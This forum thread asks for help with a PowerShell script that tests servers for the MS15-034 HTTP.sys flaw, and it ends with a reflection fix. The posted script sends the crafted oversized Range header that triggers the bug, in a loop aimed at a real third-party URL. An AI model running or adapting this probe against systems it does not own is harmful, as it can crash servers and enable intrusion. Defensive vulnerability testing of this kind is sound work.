PowerShell script to test latest HTTP vulnerability

This topic contains 4 replies, has 2 voices, and was last updated by GS 1 year, 11 months ago.

  • #24352
    GS
    Participant

    Hello,

    See here (https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/#33943)
    There is a known exploit in the wild and we do not have a PowerShell way to test it. The one specified in this article does not work, as AddRange would not allow entering a number bigger than Int64 and hence fails.
    We need to use a private method within the WebHeader collection, but I'm stuck since the code below does not return the actual object, which it should.

    [System.Net.WebHeaderCollection].GetType().GetMethod("AddWithoutValidate", 36) -eq $null

  • #24353
    Don Jones
    Keymaster

    That code is performing a comparison, and it's always going to return $true or $false as a result.

  • #24355
    GS
    Participant

    Correct, and it always returns $null, which means this object is not created, which is needed to test the exploit code, since the AddRange() method only accepts Int64 when in fact it needs to accept UInt64, and the only way to do that is to use this protected method, which should work, but in PowerShell it's not instantiated.

  • #24356
    GS
    Participant

    The actual code is below, which does not work due to the issue mentioned:

    for ($inc=1; $inc -le 1844674407370955161; $inc++)
    {
        # Look up the non-public instance method; as posted, this lookup returns $null (the issue mentioned)
        [System.Reflection.MethodInfo] $method = [System.Net.WebHeaderCollection].GetType().GetMethod("AddWithoutValidate",([System.Reflection.BindingFlags]::Instance -bor [System.Reflection.BindingFlags]::NonPublic));
        $httprequest=[System.Net.HttpWebRequest]::Create("http://www.microsoft.com/scripts/common.js")
        # Header name and value passed to AddWithoutValidate
        $params = @("Range", "bytes=$inc-18446744073709551615")
        $method.Invoke( $httprequest.Headers, $params)
        try
        {
            $response = $httprequest.GetResponse();
            # Close the response (HttpWebRequest itself has no Close method)
            $response.Close();
        }
        catch
        {}
    }

  • #24360
    GS
    Participant

    Found it out. No need for GetType() after the type; this works otherwise.
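
The reflection pitfall resolved in this thread, as an added example that is not part of the original posts: calling GetType() on a type literal returns the runtime's own Type class, so GetMethod searches the wrong class and returns $null. The variable names and the X-Example header are assumptions chosen for illustration, and the method is invoked on a stand-alone collection, so no request is created or sent.

```powershell
# Added illustration; $flags, $metaType, $wrong, $right and $headers are names chosen here.
$flags = [System.Reflection.BindingFlags]::Instance -bor
         [System.Reflection.BindingFlags]::NonPublic   # numeric value 36, as in the first post

# [T].GetType() describes the Type object itself (System.RuntimeType),
# so the lookup searches the wrong class and returns $null.
$metaType = [System.Net.WebHeaderCollection].GetType()
$wrong    = $metaType.GetMethod('AddWithoutValidate', $flags)

# [T] is already the System.Type for WebHeaderCollection, so look it up directly.
$right = [System.Net.WebHeaderCollection].GetMethod('AddWithoutValidate', $flags)

# Report which class each lookup searched and whether the method was found.
"{0,-35} found: {1}" -f $metaType.FullName, ($null -ne $wrong)
"{0,-35} found: {1}" -f [System.Net.WebHeaderCollection].FullName, ($null -ne $right)

if ($null -eq $right) { throw 'AddWithoutValidate not found on this runtime' }

# Invoke the protected method on a local collection (constructed header name and value).
$headers = New-Object System.Net.WebHeaderCollection
[void]$right.Invoke($headers, [object[]]@('X-Example', 'constructed-value'))
$headers['X-Example']
```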
